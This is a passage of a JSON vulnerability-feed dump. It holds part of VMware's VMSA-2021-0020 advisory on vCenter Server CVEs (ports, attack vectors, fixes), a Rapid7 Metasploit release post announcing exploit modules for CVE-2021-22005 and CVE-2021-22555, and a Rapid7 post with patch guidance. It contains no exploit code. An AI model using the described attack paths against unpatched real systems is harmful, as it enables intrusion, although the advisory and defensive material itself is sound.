Version' column of the 'Response Matrix' below to affected deployments. \n\n\n**Workarounds**\n\nNone. \n\n\n**Additional Documentation**\n\nA supplemental blog post was created for additional clarification. Please see: <https://via.vmw.com/vmsa-2021-0020-faq> \n\n\n**Notes**\n\nNone.\n\n**Acknowledgements**\n\nVMware would like to thank George Noseevich (@webpentest) and Sergey Gerasimov of SolidLab LLC for reporting this issue to us.\n\n\n\n##### **3k. vCenter Server file deletion vulnerability (CVE-2021-22018)** \n\n\n**Description**\n\nThe vCenter Server contains an arbitrary file deletion vulnerability in a VMware vSphere Life-cycle Manager plug-in. VMware has evaluated the severity of this issue to be in the [Moderate severity range](<https://www.vmware.com/support/policies/security_response.html>) with a maximum CVSSv3 base score of [6.5](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L>)[.](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>) \n\n\n**Known Attack Vectors**\n\nA malicious actor with network access to port 9087 on vCenter Server may exploit this issue to delete non critical files.\n\n**Resolution**\n\nTo remediate CVE-2021-22018 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments. \n\n\n**Workarounds**\n\nNone. \n\n\n**Additional Documentation**\n\nA supplemental blog post was created for additional clarification. Please see: <https://via.vmw.com/vmsa-2021-0020-faq> \n\n\n**Notes**\n\nThis issue affects only vCenter Server 7.0.\n\n**Acknowledgements**\n\nVMware would like to thank Sergey Gerasimov of Solidlab working with Trend Micro Zero Day Initiative for reporting this issue to us. \n\n\n\n\n##### **3l. vCenter Server XML parsing denial-of-service vulnerability (CVE-2021-21992)**\n\n**Description**\n\nThe vCenter Server contains a denial-of-service vulnerability due to improper XML entity parsing. VMware has evaluated the severity of this issue to be in the [Moderate severity range](<https://www.vmware.com/support/policies/security_response.html>) with a maximum CVSSv3 base score of [6.5](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H>)[.](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>) \n\n\n**Known Attack Vectors**\n\nA malicious actor with non-administrative user access to the vCenter Server vSphere Client (HTML5) or vCenter Server vSphere Web Client (FLEX/Flash) may exploit this issue to create a denial-of-service condition on the vCenter Server host. \n\n\n**Resolution**\n\nTo remediate CVE-2021-21992 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments. \n\n\n**Workarounds**\n\nNone. \n\n\n**Additional Documentation**\n\nA supplemental blog post was created for additional clarification. Please see: <https://via.vmw.com/vmsa-2021-0020-faq> \n\n\n**Notes**\n\nNone.\n\n**Acknowledgements**\n\nVMware would like to thank Osama Alaa of Malcrove for reporting this issue to us.\n\n\n\n##### **3m. vCenter Server local information disclosure vulnerability (CVE-2021-22007)**\n\n**Description**\n\nThe vCenter Server contains a local information disclosure vulnerability in the Analytics service. VMware has evaluated the severity of this issue to be in the [Moderate severity range](<https://www.vmware.com/support/policies/security_response.html>) with a maximum CVSSv3 base score of [5.5](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N>)[.](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>) \n\n\n**Known Attack Vectors**\n\nAn authenticated user with non-administrative privilege may exploit this issue to gain access to sensitive information. \n\n\n**Resolution**\n\nTo remediate CVE-2021-22007 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments. \n\n\n**Workarounds**\n\nNone. \n\n\n**Additional Documentation**\n\nA supplemental blog post was created for additional clarification. Please see: <https://via.vmw.com/vmsa-2021-0020-faq> \n\n\n**Notes**\n\nThis issues does not affect vCenter server 6.5. \n\n\n**Acknowledgements**\n\nVMware would like to thank George Noseevich (@webpentest) and Sergey Gerasimov of SolidLab LLC for reporting this issue to us.\n\n\n\n##### **3n. vCenter Server denial of service vulnerability (CVE-2021-22019)**\n\n**Description**\n\nThe vCenter Server contains a denial-of-service vulnerability in VAPI (vCenter API) service. VMware has evaluated the severity of this issue to be in the [Moderate severity range](<https://www.vmware.com/support/policies/security_response.html>) with a maximum CVSSv3 base score of [5.3](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L>)[.](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>) \n\n\n**Known Attack Vectors**\n\nA malicious actor with network access to port 5480 on vCenter Server may exploit this issue by sending a specially crafted jsonrpc message to create a denial of service condition. \n\n\n**Resolution**\n\nTo remediate CVE-2021-22019 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments. \n\n\n**Workarounds**\n\nNone. \n\n\n**Additional Documentation**\n\nA supplemental blog post was created for additional clarification. Please see: <https://via.vmw.com/vmsa-2021-0020-faq> \n\n\n**Notes**\n\nNone.\n\n**Acknowledgements**\n\nVMware would like to thank Sergey Gerasimov and George webpentest Noseevich of Solidlab working with Trend Micro Zero Day Initiative for reporting these issues to us.\n\n\n\n##### **3o. vCenter Server VAPI multiple denial of service vulnerabilities (CVE-2021-22009)**\n\n**Description**\n\nThe vCenter Server contains multiple denial-of-service vulnerabilities in VAPI (vCenter API) service.VMware has evaluated the severity of these issues to be in the [Moderate severity range](<https://www.vmware.com/support/policies/security_response.html>) with a maximum CVSSv3 base score of [5.3](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L>)[.](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>) \n\n\n**Known Attack Vectors**\n\nA malicious actor with network access to port 443 on vCenter Server may exploit these issues to create a denial of service condition due to excessive memory consumption by VAPI service. \n\n\n**Resolution**\n\nTo remediate CVE-2021-22009 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments. \n\n\n**Workarounds**\n\nNone. \n\n\n**Additional Documentation**\n\nA supplemental blog post was created for additional clarification. Please see: <https://via.vmw.com/vmsa-2021-0020-faq> \n\n\n**Notes**\n\nNone.\n\n**Acknowledgements**\n\nVMware would like to thank Sergey Gerasimov and George webpentest Noseevich of Solidlab working with Trend Micro Zero Day Initiative for reporting these issues to us.\n\n\n\n##### **3p. vCenter Server VPXD denial of service vulnerability (CVE-2021-22010)**\n\n**Description**\n\nThe vCenter Server contains a denial-of-service vulnerability in VPXD (Virtual Provisioning X Daemon) service. VMware has evaluated the severity of this issue to be in the [Moderate severity range](<https://www.vmware.com/support/policies/security_response.html>) with a maximum CVSSv3 base score of [5.3](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L>)[.](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>) \n\n\n**Known Attack Vectors**\n\nA malicious actor with network access to port 443 on vCenter Server may exploit this issue to create a denial of service condition due to excessive memory consumption by VPXD service. \n\n\n**Resolution**\n\nTo remediate CVE-2021-22010 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments. \n\n\n**Workarounds**\n\nNone. \n\n\n**Additional Documentation**\n\nA supplemental blog post was created for additional clarification. Please see: <https://via.vmw.com/vmsa-2021-0020-faq> \n\n\n**Notes**\n\nThis issues does not affect vCenter server 6.5. \n\n\n**Acknowledgements**\n\nVMware would like to thank George Noseevich (@webpentest) and Sergey Gerasimov of SolidLab LLC for reporting this issue to us.\n\n\n\n##### **3q. vCenter Server information disclosure vulnerability (CVE-2021-22008)**\n\n**Description**\n\nThe vCenter Server contains an information disclosure vulnerability in VAPI (vCenter API) service.VMware has evaluated the severity of this issue to be in the [Moderate severity range](<https://www.vmware.com/support/policies/security_response.html>) with a maximum CVSSv3 base score of [5.3](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N>)[.](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>) \n\n\n**Known Attack Vectors**\n\nA malicious actor with network access to port 443 on vCenter Server may exploit this issue by sending a specially crafted jsonrpc message to gain access to sensitive information. \n\n\n**Resolution**\n\nTo remediate CVE-2021-22008 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments. \n\n\n**Workarounds**\n\nNone. \n\n\n**Additional Documentation**\n\nA supplemental blog post was created for additional clarification. Please see: <https://via.vmw.com/vmsa-2021-0020-faq> \n\n\n**Notes**\n\nNone.\n\n**Acknowledgements**\n\nVMware would like to thank Sergey Gerasimov and George webpentest Noseevich of Solidlab working with Trend Micro Zero Day Initiative for reporting this issue to us.\n\n\n\n##### **3r. vCenter Server Analytics service denial-of-service Vulnerability (CVE-2021-22020)**\n\n**Description**\n\nThe vCenter Server contains a denial-of-service vulnerability in the Analytics service. VMware has evaluated the severity of this issue to be in the [Moderate severity range](<https://www.vmware.com/support/policies/security_response.html>) with a maximum CVSSv3 base score of [5.0](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H>).\n\n**Known Attack Vectors**\n\nSuccessful exploitation of this issue may allow an attacker to create a denial-of-service condition on vCenter Server. \n\n\n**Resolution**\n\nTo remediate CVE-2021-22020 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments. \n\n\n**Workarounds**\n\nNone. \n\n\n**Additional Documentation**\n\nA supplemental blog post was created for additional clarification. Please see: <https://via.vmw.com/vmsa-2021-0020-faq> \n\n\n**Notes**\n\nThis issue does not affect vCenter Server 6.5. \n\n\n**Acknowledgements**\n\nVMware would like to thank George Noseevich (@webpentest) and Sergey Gerasimov of SolidLab LLC for reporting this issue to us.\n\n\n\n##### **3s. vCenter Server SSRF vulnerability (CVE-2021-21993)**\n\n**Description**\n\nThe vCenter Server contains an SSRF (Server Side Request Forgery) vulnerability due to improper validation of URLs in vCenter Server Content Library. VMware has evaluated the severity of this issue to be in the [Moderate severity range](<https://www.vmware.com/support/policies/security_response.html>) with a maximum CVSSv3 base score of [4.3](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N>)[.](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>) \n\n\n**Known Attack Vectors**\n\nAn authorised user with access to content library may exploit this issue by sending a POST request to vCenter Server leading to information disclosure. \n\n\n**Resolution**\n\nTo remediate CVE-2021-21993 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments. \n\n\n**Workarounds**\n\nNone. \n\n\n**Additional Documentation**\n\nA supplemental blog post was created for additional clarification. Please see: <https://via.vmw.com/vmsa-2021-0020-faq> \n\n\n**Notes**\n\nNone. \n\n\n**Acknowledgements**\n\nVMware would like to thank Osama Alaa of Malcrove and vitquay of Vantage Point Security for independently reporting this issue to us. \n\n\n", "cvss3": {}, "published": "2021-09-21T00:00:00", "type": "vmware", "title": "VMware vCenter Server updates address multiple security vulnerabilities", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-21991", "CVE-2021-21992", "CVE-2021-21993", "CVE-2021-22005", "CVE-2021-22006", "CVE-2021-22007", "CVE-2021-22008", "CVE-2021-22009", "CVE-2021-22010", "CVE-2021-22011", "CVE-2021-22012", "CVE-2021-22013", "CVE-2021-22014", "CVE-2021-22015", "CVE-2021-22016", "CVE-2021-22017", "CVE-2021-22018", "CVE-2021-22019", "CVE-2021-22020"], "modified": "2021-09-21T00:00:00", "id": "VMSA-2021-0020", "href": "https://www.vmware.com/security/advisories/VMSA-2021-0020.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T15:13:00", "description": "3a. vCenter Server file upload vulnerability (CVE-2021-22005) \n\nThe vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. \n\n3b. vCenter Server local privilege escalation vulnerability (CVE-2021-21991) \n\nThe vCenter Server contains a local privilege escalation vulnerability due to the way it handles session tokens. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.8. \n\n3c. vCenter Server reverse proxy bypass vulnerability (CVE-2021-22006) \n\nThe vCenter Server contains a reverse proxy bypass vulnerability due to the way the endpoints handle the URI. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.3. \n\n3d. vCenter server unauthenticated API endpoint vulnerability (CVE-2021-22011) \n\nThe vCenter Server contains an unauthenticated API endpoint vulnerability in vCenter Server Content Library. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.1. \n\n3e. vCenter Server improper permission local privilege escalation vulnerabilities (CVE-2021-22015) \n\nThe vCenter Server contains multiple local privilege escalation vulnerabilities due to improper permissions of files and directories. VMware has evaluated the severity of these issues to be in the Important severity range with a maximum CVSSv3 base score of 7.8. \n\n3f. vCenter Server unauthenticated API information disclosure vulnerability (CVE-2021-22012) \n\nThe vCenter Server contains an information disclosure vulnerability due to an unauthenticated appliance management API. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.5. \n\n3g. vCenter Server file path traversal vulnerability (CVE-2021-22013) \n\nThe vCenter Server contains a file path traversal vulnerability leading to information disclosure in the appliance management API. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.5. \n\n3h. vCenter Server reflected XSS vulnerability (CVE-2021-22016) \n\nThe vCenter Server contains a reflected cross-site scripting vulnerability due to a lack of input sanitization. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.5. \n\n3i. vCenter Server rhttpproxy bypass vulnerability (CVE-2021-22017) \n\nRhttproxy as used in vCenter Server contains a vulnerability due to improper implementation of URI normalization. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.3. \n\n3j. vCenter Server authenticated code execution vulnerability (CVE-2021-22014) \n\nThe vCenter Server contains an authenticated code execution vulnerability in VAMI (Virtual Appliance Management Infrastructure). VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.2. \n\n3k. vCenter Server file deletion vulnerability (CVE-2021-22018) \n\nThe vCenter Server contains an arbitrary file deletion vulnerability in a VMware vSphere Life-cycle Manager plug-in. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 6.5. \n\n3l. vCenter Server XML parsing denial-of-service vulnerability (CVE-2021-21992) \n\nThe vCenter Server contains a denial-of-service vulnerability due to improper XML entity parsing. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 6.5. \n\n3m. vCenter Server local information disclosure vulnerability (CVE-2021-22007) \n\nThe vCenter Server contains a local information disclosure vulnerability in the Analytics service. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 5.5. \n\n3n. vCenter Server denial of service vulnerability (CVE-2021-22019) \n\nThe vCenter Server contains a denial-of-service vulnerability in VAPI (vCenter API) service. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 5.3. \n\n3o. vCenter Server VAPI multiple denial of service vulnerabilities (CVE-2021-22009) \n\nThe vCenter Server contains multiple denial-of-service vulnerabilities in VAPI (vCenter API) service.VMware has evaluated the severity of these issues to be in the Moderate severity range with a maximum CVSSv3 base score of 5.3. \n\n3p. vCenter Server VPXD denial of service vulnerability (CVE-2021-22010) \n\nThe vCenter Server contains a denial-of-service vulnerability in VPXD (Virtual Provisioning X Daemon) service. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 5.3. \n\n3q. vCenter Server information disclosure vulnerability (CVE-2021-22008) \n\nThe vCenter Server contains an information disclosure vulnerability in VAPI (vCenter API) service.VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 5.3. \n\n3r. vCenter Server Analytics service denial-of-service Vulnerability (CVE-2021-22020) \n\nThe vCenter Server contains a denial-of-service vulnerability in the Analytics service. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 5.0. \n\n3s. vCenter Server SSRF vulnerability (CVE-2021-21993) \n\nThe vCenter Server contains an SSRF (Server Side Request Forgery) vulnerability due to improper validation of URLs in vCenter Server Content Library. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 4.3.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-21T00:00:00", "type": "vmware", "title": "VMware vCenter Server updates address multiple security vulnerabilities", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21991", "CVE-2021-21992", "CVE-2021-21993", "CVE-2021-22005", "CVE-2021-22006", "CVE-2021-22007", "CVE-2021-22008", "CVE-2021-22009", "CVE-2021-22010", "CVE-2021-22011", "CVE-2021-22012", "CVE-2021-22013", "CVE-2021-22014", "CVE-2021-22015", "CVE-2021-22016", "CVE-2021-22017", "CVE-2021-22018", "CVE-2021-22019", "CVE-2021-22020"], "modified": "2021-09-24T00:00:00", "id": "VMSA-2021-0020.1", "href": "https://www.vmware.com/security/advisories/VMSA-2021-0020.1.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-10-08T16:58:28", "description": "## Telemetry is for gathering data, not executing commands as root, right?...\n\n![Metasploit Wrap-Up](https://blog.rapid7.com/content/images/2021/10/metasploit-pumpkin-1.jpg)\n\nThis week's highlight is a new exploit module by our own [wvu](<https://twitter.com/wvuuuuuuuuuuuuu>) for VMware vCenter Server CVE-2021-22005, a file upload vuln that arises from a flaw in vCenter\u2019s analytics/telemetry service, which is enabled by default. Attackers with network access to port 443 can upload a specially crafted file, after which commands can be executed as the root user without prior authentication. As usual, this latest vCenter Server vulnerability was exploited in the wild quickly after details were released. See Rapid7\u2019s full technical analysis in [AttackerKB](<https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis?referrer=blog>).\n\n## Good ol' Netfilter\n\nThis week\u2019s release also includes a privilege escalation module for a Linux kernel vulnerability in Netfilter that lets you get a root shell through an out-of-bounds write. The vulnerability was discovered by [Andy Nguyen](<https://twitter.com/theflow0>) and has been present in the Linux kernel for the past 15 years. The module currently supports 18 versions of the Ubuntu kernel ranging between 5.8.0-23 to 5.8.0-53 thanks to [bcoles](<https://github.com/bcoles>), and there are plans to add further support for kernel versions 4.x in the future, once an ROP chain for said version is created.\n\n## New module content (3)\n\n * [VMware vCenter Server Analytics (CEIP) Service File Upload](<https://github.com/rapid7/metasploit-framework/pull/15747>) by wvu, Derek Abdine, George Noseevich, Sergey Gerasimov, and VMware, which exploits [CVE-2021-22005](<https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005?referrer=blog>) \\- This adds an exploit for CVE-2021-22005 which is an unauthenticated RCE within the VMWare vCenter appliance.\n * [Netfilter x_tables Heap OOB Write Privilege Escalation](<https://github.com/rapid7/metasploit-framework/pull/15698>) by Andy Nguyen (theflow0), Szymon Janusz and bcoles, which exploits [CVE-2021-22555](<https://attackerkb.com/topics/J8IVZzRUyG/cve-2021-22555?referrer=blog>) \\- This PR adds a module for CVE-2021-22555, a 15-year-old heap out-of-bounds write vulnerability in Linux Netfilter.\n * [Diagnostic State](<https://github.com/rapid7/metasploit-framework/pull/15739>) by Jay Turla - Adds a new `post/hardware/automotive/diagnostic_state` module which will keep the vehicle in a diagnostic state.\n\n## Enhancements and features\n\n * [#15735](<https://github.com/rapid7/metasploit-framework/pull/15735>) from [jaydesl](<https://github.com/jaydesl>) \\- Fixes a Rails 6 deprecation warning when a user ran `db_disconnect` in msfconsole\n * [#15740](<https://github.com/rapid7/metasploit-framework/pull/15740>) from [h00die](<https://github.com/h00die>) \\- Several improvements have been made to the Ghostcat module to align it with recent standards changes that the team has made and to ensure its documentation is more descriptive.\n * [#15750](<https://github.com/rapid7/metasploit-framework/pull/15750>) from [jmartin-r7](<https://github.com/jmartin-r7>) \\- Improves Ruby 3.0.2 support on Windows\n\n## Bugs fixed\n\n * [#15729](<https://github.com/rapid7/metasploit-framework/pull/15729>) from [ErikWynter](<https://github.com/ErikWynter>) \\- This fixes a bug in the PrintNightmare check method where if an RPC function returns a value that can't be mapped to a Win32 error code, the module would crash.\n * [#15730](<https://github.com/rapid7/metasploit-framework/pull/15730>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- The `check` method for the Gitea Git hooks RCE module has been updated to correctly handle older versions of Gitea and report their exploitability as unknown vs reporting the target as not running Gitea.\n * [#15737](<https://github.com/rapid7/metasploit-framework/pull/15737>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- A bug has been fixed whereby `action` wasn't correctly being set when using the action name as a command. `action` should now hold the right value when using the action name as a command.\n * [#15745](<https://github.com/rapid7/metasploit-framework/pull/15745>) from [bwatters-r7](<https://github.com/bwatters-r7>) \\- A bug has been fixed in `tools/dev/msftidy.rb` whereby if the `Notes` section was placed before the `References` section, then `msftidy` would end up not checking the `References` section and would therefore state the module didn't have a CVE reference, even when it did.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.1.8...6.1.9](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-09-30T11%3A56%3A48-05%3A00..2021-10-06T17%3A12%3A52-05%3A00%22>)\n * [Full diff 6.1.8...6.1.9](<https://github.com/rapid7/metasploit-framework/compare/6.1.8...6.1.9>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-08T16:57:33", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005", "CVE-2021-22555"], "modified": "2021-10-08T16:57:33", "id": "RAPID7BLOG:C1B4AB12CDDD030CDAB31AA2F9E27438", "href": "https://blog.rapid7.com/2021/10/08/metasploit-wrap-up-133/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-04T19:05:10", "description": "![Critical vCenter Server File Upload Vulnerability \$CVE-2021-22005\$](https://blog.rapid7.com/content/images/2021/09/vcenter-vuln.jpg)\n\n_See the Updates section at the end of this post for new information as it comes to light, including reports of exploitation._\n\n## Description\n\nOn Tuesday, September 21, 2021, VMware published [security advisory VMSA-2021-0020](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>), which includes details on CVE-2021-22005, a critical file upload vulnerability (CVSSv3 9.8) in vCenter Server that allows remote code execution (RCE) on the appliance. Successful exploitation of this vulnerability is achieved simply by uploading a specially crafted file via port 443 \u201cregardless of the configuration settings of vCenter Server.\u201d\n\nVMware has published an [FAQ](<https://core.vmware.com/vmsa-2021-0020-questions-answers-faq#section1>) outlining the details of this vulnerability and makes it clear that this should be patched \u201cimmediately.\u201d A workaround is also being provided by VMware \u2014 however, its use is not being recommended and should only be used as a temporary solution.\n\nYou can find Rapid7's vulnerability analysis on [AttackerKB](<https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis?referrer=blog>) which contains a root cause analysis and full RCE information.\n\n## Affected products\n\n * vCenter Server versions 6.7 and 7.0\n * Cloud Foundation (vCenter Server) 3.x, 4.x\n\n## Guidance\n\nWe echo VMware\u2019s advice that impacted servers should be patched right away. While there are currently no reports of exploitation, we expect this to quickly change within days \u2014 just as previous critical vCenter vulnerabilities did ([CVE-2021-21985](<https://www.rapid7.com/blog/post/2021/05/26/cve-2021-21985-vcenter-server-what-you-need-to-know/>), [CVE-2021-21972](<https://www.rapid7.com/blog/post/2021/02/24/vmware-vcenter-server-cve-2021-21972-remote-code-execution-vulnerability-what-you-need-to-know/>)). Additionally, Rapid7 recommends that, as a general practice, network access to critical organizational infrastructure only be allowed via VPN and never open to the public internet.\n\nWe will update this post as more information becomes available, such as information on exploitation.\n\n## Rapid7 customers\n\nA vulnerability check for CVE-2021-22005 is under development and will be available to InsightVM and Nexpose customers in an upcoming content release pending the QA process.\n\nIn the meantime, InsightVM customers can use [Query Builder](<https://docs.rapid7.com/insightvm/query-builder/>) to find assets that have vCenter Server installed by creating the following query: `software.description` `contains` `vCenter Server`. Rapid7 Nexpose customers can create a [Dynamic Asset Group](<https://docs.rapid7.com/nexpose/performing-filtered-asset-searches>) based on a filtered asset search for `Software name` `contains` `vCenter Server`.\n\n## Updates\n\n**[September 22, 2021]** \nAn InsightVM and Nexpose vulnerability check for CVE-2021-22005 is scheduled to be released on the afternoon (EST) of September 22, 2021.\n\nRapid7 Labs estimates there are over 2,700 vulnerable vCenter servers exposed to the public internet. This represents only a fraction of vulnerable servers, however, as attackers with existing network ingress will be tempted to utilize that access to take advantage of this vulnerability. ![Critical vCenter Server File Upload Vulnerability \$CVE-2021-22005\$](https://blog.rapid7.com/content/images/2021/09/vcenter09.png)\n\n**[September 23, 2021]** \nCVE-2021-22005 authenticated checks for InsightVM and Nexpose are available in content update 3594982882, released on September 23, 2021.\n\n**[September 24, 2021]** \nCVE-2021-22005 is now being [exploited](<https://twitter.com/bad_packets/status/1441465508348317702>) in the wild.\n\n**[September 29, 2021]** \nUpdated description to include a link to the Rapid7 analysis on [AttackerKB](<https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis?referrer=blog>)\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-21T19:55:35", "type": "rapid7blog", "title": "Critical vCenter Server File Upload Vulnerability (CVE-2021-22005)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972", "CVE-2021-21985", "CVE-2021-22005"], "modified": "2021-09-21T19:55:35", "id": "RAPID7BLOG:076DBD838FD2726D9F20BCEAFC2D960D", "href": "https://blog.rapid7.com/2021/09/21/critical-vcenter-server-file-upload-vulnerability-cve-2021-22005/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, 